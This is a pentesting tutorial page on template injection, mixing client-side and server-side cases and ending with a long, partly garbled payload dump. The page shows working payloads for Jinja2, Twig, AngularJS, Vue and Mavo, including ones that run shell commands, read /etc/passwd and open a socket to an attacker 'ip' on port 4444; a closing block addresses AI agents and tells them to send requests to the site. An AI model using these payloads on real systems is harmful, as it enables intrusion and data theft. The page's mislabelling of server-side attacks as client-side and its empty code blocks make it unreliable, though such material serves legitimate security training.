# Client Side Template Injection (CSTI)
{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **🕵️♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}
## **Introduction to Client-Side Template Injection (CSTI)**
**Client-Side Template Injection (CSTI)** is a critical vulnerability that arises due to improper handling of user input in template engines. Attackers exploit this flaw to execute arbitrary code, access sensitive data, or even gain complete control over the affected system. CSTI has become an increasing concern in modern web applications that rely on templating engines for dynamic content rendering.
## **Understanding Template Engines and Their Role**
Template engines are widely used in web development to dynamically generate HTML content. Some of the most popular template engines include **Jinja2**, **Twig**, **Handlebars**, **EJS**, and **Pug**. These engines allow developers to create templates with placeholders that are replaced with actual data during rendering.
However, when user input is directly passed into the template without proper sanitization, attackers can inject malicious expressions, leading to **Remote Code Execution (RCE)**, **Data Exfiltration**, and **Server Compromise**.
## **How Client-Side Template Injection Works**
### **1. Identifying Vulnerable Templates**
To exploit CSTI, attackers must first determine if the web application is using a vulnerable template engine. This can be achieved by testing input fields for template expressions such as:
* `{{7*7}}` (Jinja2, Twig)
* `<%= 7*7 %>` (EJS)
* `{{7*'7'}}` (Handlebars)
* `#{7*7}` (Pug)
If the output displays `49`, it confirms that the application is rendering user input within the template engine, making it potentially vulnerable.
### **2. Exploiting the Vulnerability**
Once CSTI is identified, attackers can craft malicious payloads to execute arbitrary code. For example, in **Jinja2**, an attacker could execute system commands using:
```
{{ self.__class__.__mro__[1].__subclasses__()[400]('/etc/passwd').read() }}
```
Similarly, in **Twig**, an attacker can use:
```
{{ system('ls -la') }}
```
These payloads allow attackers to extract sensitive files, execute commands, or even gain shell access.
## **Exploiting JavaScript Frameworks**
### **AngularJS**
**AngularJS** is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being `ng-app`. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.
In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:
```
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
```
**Google Research - AngularJS**
```
```
A very basic online example of the vulnerability in AngularJS can be found at [this JSFiddle link](http://jsfiddle.net/2zs2yv7o/) and in Burp Suite Academy.
> **CAUTION:** Angular 1.6 removed the sandbox, so from this version, a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work.
### **VueJS**
A vulnerable Vue implementation can be found at [this example](https://vue-client-side-template-injection-example.azu.now.sh/).
**Working Payload:**
```
https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
```
The source code of the vulnerable example is available at [GitHub](https://github.com/azu/vue-client-side-template-injection-example).
**Google Research - Vue.js**
```
">
aaa
```
A detailed post on CSTI in Vue can be found at [PortSwigger](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets).
**Additional Vue Payloads:**
* **V3:** `{{_openBlock.constructor('alert(1)')()}}`
* **V2:** `{{constructor.constructor('alert(1)')()}}`
More Vue payloads can be found in the [PortSwigger XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected).
### **Mavo**
**Payloads:**
```
[7*7]
[(1,alert)(1)]
{{top.alert(1)}}
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
test
{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{42*42}
{^xyzm42}1764{/xyzm42}
{php}echo `id`;{/php}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ [].class.base.subclasses() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{ request }}
{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.class.mro()[1].subclasses()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.toUpperCase()}}
{{2*2}}[[3*3]]
{{3*'3'}}
{{3*3}}
{{4*4}}[[5*5]]
{{42*42}}
{{7*'7'}}
{{7*7}}
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
{{=42*42}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|filter('system')}}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{app.request.server.all|join(',')}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{config.items()}}
{{cycler.__init__.__globals__.os}}
{{dump(app)}}
{{joiner.__init__.__globals__.os}}
{{namespace.__init__.__globals__.os}}
{{request.__class__}}
{{request|attr("__class__")}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os}}
{{self._TemplateReference__context.namespace.__init__.__globals__.os}}
{{self}}
{{{42*42}}}
```
**Client-Side Template Injection (CSTI)** is a serious security risk that can lead to devastating consequences, including **Remote Code Execution (RCE), data theft, and server compromise**. By implementing **proper input validation, escaping user input, using secure template engines, and enforcing security policies**, organizations can effectively mitigate the risks associated with CSTI. Regular security assessments and penetration testing remain crucial to ensuring the safety of web applications.
## Videos:
{% embed url="" %}
{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)
Support VeryLazyTech 🎉
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **🕵️♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.verylazytech.com/pentesting-web/client-side-template-injection-csti.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.